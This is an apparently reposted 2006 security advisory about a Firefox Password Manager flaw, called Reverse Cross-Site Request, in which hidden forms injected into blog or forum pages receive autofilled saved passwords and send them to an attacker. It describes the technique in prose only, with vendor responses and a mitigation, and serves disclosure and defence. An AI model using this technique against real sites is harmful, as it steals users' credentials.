Chapin Information Services (CIS) has discovered a new flaw in the Mozilla Firefox web browser that exposes saved passwords to clever attackers.

Given the new nature of this type of attack, CIS has named this a Reverse Cross-Site Request (RCSR) vulnerability.

This flaw could affect anyone visiting a weblog or forum website that allows user-contributed HTML codes to be added.

A proof-of-concept demonstration is available at the CIS website.

RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed...

The Password Manager component of FireFox can be exploited to send a username and password combination to an attacker's computer without the user's knowledge.

Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses.

A recent large-scale attack using RCSR targeted MySpace.com users and was first reported by Netcraft 10/27/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password.

Forms and links can been used in a similar way to carry out Cross-Site Request Forgery (CSRF) attacks. The difference between CSRF and this new breed of RCSR attacks is the direction of data flow.

CSRF attacks are commonly used to add content to a blog or forum without the user's knowledge. This can be done by "forging" a link or form that the website does not correctly verify with the user.

RCSR, by contrast, takes content from the blog or forum by creating a form on the website directed back to the attacker.

The RCSR attack is much more likely to succeed because neither Internet Explorer nor Firefox are designed to check the destination of form data before the user submits them. The user sees a trusted website address in the browser's address bar because the exploit is conducted at the trusted website.

On 11/12/2006, CIS reported to Mozilla that the Firefox web browser will automatically fill saved usernames and passwords into such RCSR forms. This behavior does not occur in Internet Explorer unless the RCSR form appears on the same page as a legitimate login form.

Exacerbating this problem is the fact that forms can be completely hidden from view. As demonstrated in the CIS proof-of-concept, after saving a website password in Firefox, it is possible for that password to be transmitted to another website by unwittingly clicking on an invisible image link.

Mozilla confirmed this as bug number 360493, and said they are already working on a fix for version 2.0.0.1 or 2.0.0.2.

Suggestions have been made about the benefits of website changes as well as browser updates to combat RCSR problems. These are increasingly valid concerns for webmasters. However, a flawed Password Manager will have to be fixed by the authors. CIS has recommended several changes to both Firefox and Internet Explorer.

Microsoft responded by saying, "We are aware of the issue you reported." And, "As a matter of policy, we cannot comment on ongoing investigations."

Webmasters need to be aware of the implications of RCSR forms and how they work once added to a website. No client-side scripting is needed to steal information in this way, so this is not a Cross-Site Scripting (XSS) attack.

CIS recommends all webmasters review server code for the possibility of XSS and RCSR injections, especially operators of encrypted websites. These attacks could be highly effective against firewalled local network servers and HTTPS addresses that are not otherwise accessible because the attacker does not need direct access.

In theory, combined CSRF and RCSR injections could change the appearance of a website and steal the user's password, even if scripts are filtered from user data.

Solution:
Disable the "Remember passwords for sites" option in the preferences.

Comments Index (Total Messages: 0)

Post Reply
Name:	Guest
Title:
Comment:
Enter this security word

Powered by a Zone-H(ified) version of AkoComment 3.0!